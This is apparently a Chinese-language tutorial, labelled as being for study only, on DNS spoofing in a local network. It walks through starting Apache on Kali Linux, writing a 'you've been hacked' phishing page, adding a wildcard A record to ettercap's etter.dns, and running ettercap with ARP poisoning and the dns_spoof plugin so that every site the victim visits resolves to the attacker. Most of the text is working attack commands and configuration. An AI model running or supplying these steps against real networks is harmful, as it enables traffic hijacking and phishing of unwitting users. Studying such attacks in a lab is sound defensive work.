DNS欺骗攻击——实现受害者访问任何网站都转向到攻击者指定的网站 (仅供学习参考) 情景要求: 同一局域网内 受害者IP:192.168.26.130 攻击者系统Kali Linux,IP地址:192.168.26.129 第一步:kali Linux打开apache2服务。 输入打开命令:service apache2 start 查看是否打开命令:service apache2 status 有小绿点就是已经打开了。 下一步:制作我们的钓鱼网页 命令如下:vi /var/www/html/index.html 有html5基础的小伙伴可制作制作 没有基础的可输入如下代码:
<html>
<head>
</head>
<body>
<a >你被黑了。</a>
</body>
</html>
如图: 输入完成代码退出文本; 切换到受害者机子打开浏览器输入攻击者测试是否成功: 这些都测试没问题之后,到正题了。我们的目的是让受害者机子输入任何网站都显示我们制作的钓鱼网站。 回到攻击者机子kali linux 输入命令修改ettercap DNS文件; 命令如下:vi /etc/ettercap/etter.dns 修改如图 添加:* A 192.168.26.129(也就是添加攻击者IP)添加完成退出文本; 还差最后一步了, 输入命令:ettercap -i eth0 -T -P dns_spoof -M arp /192.168.26.130///(IP是受害者的) 如图: 然后我们回到受害者机子输入www.baidu.com测试是否跳转到我们制作的钓鱼网页。 如图测试成功: